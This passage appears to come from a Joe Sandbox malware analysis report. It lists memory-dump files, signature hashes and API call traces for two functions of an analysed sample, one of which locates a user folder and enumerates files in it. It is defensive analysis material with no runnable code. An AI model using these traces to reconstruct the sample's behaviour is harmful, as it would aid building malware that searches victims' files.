                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: cef4593c7f1d94ae207e4897b63b2d30651d8630729fa8262f1db103701067fc
                            • Instruction ID: 0b502caa1777659a3f1fa81f0ddd8a4ad97179c9ab0871f1e6befd4b4f78c5f0
                            • Opcode Fuzzy Hash: cef4593c7f1d94ae207e4897b63b2d30651d8630729fa8262f1db103701067fc
                            • Instruction Fuzzy Hash: 27F09A32910A009FEF23BBF8A946B5AB3A0AF00720F255249F405AE2D2DB745D409E96
                            Function 00394F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00394F7A
                            • lstrcat.KERNEL32(?,003A1070), ref: 00394F97
                            • lstrcat.KERNEL32(?,01158F00), ref: 00394FAB
                            • lstrcat.KERNEL32(?,003A1074), ref: 00394FBD
                              • Part of subcall function 00394910: wsprintfA.USER32 ref: 0039492C
                              • Part of subcall function 00394910: FindFirstFileA.KERNEL32(?,?), ref: 00394943
                              • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                              • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                              • Part of subcall function 00394910: FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                              • Part of subcall function 00394910: FindClose.KERNEL32(000000FF), ref: 00394B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 551205a64b56b7b9297c4544a59af961fccf46dc4e4a828ef755ed4f37b579c2
                            • Instruction ID: 930e95796e892f7ca87ecfb79f1d3be219c2b881a93a4580ed450fc2723dcc5f
                            • Opcode Fuzzy Hash: 551205a64b56b7b9297c4544a59af961fccf46dc4e4a828ef755ed4f37b579c2
                            • Instruction Fuzzy Hash: C421DA7690020C6BCB55FBB0EC46EEE373CAB65304F004584B64996181EE749ACDCB92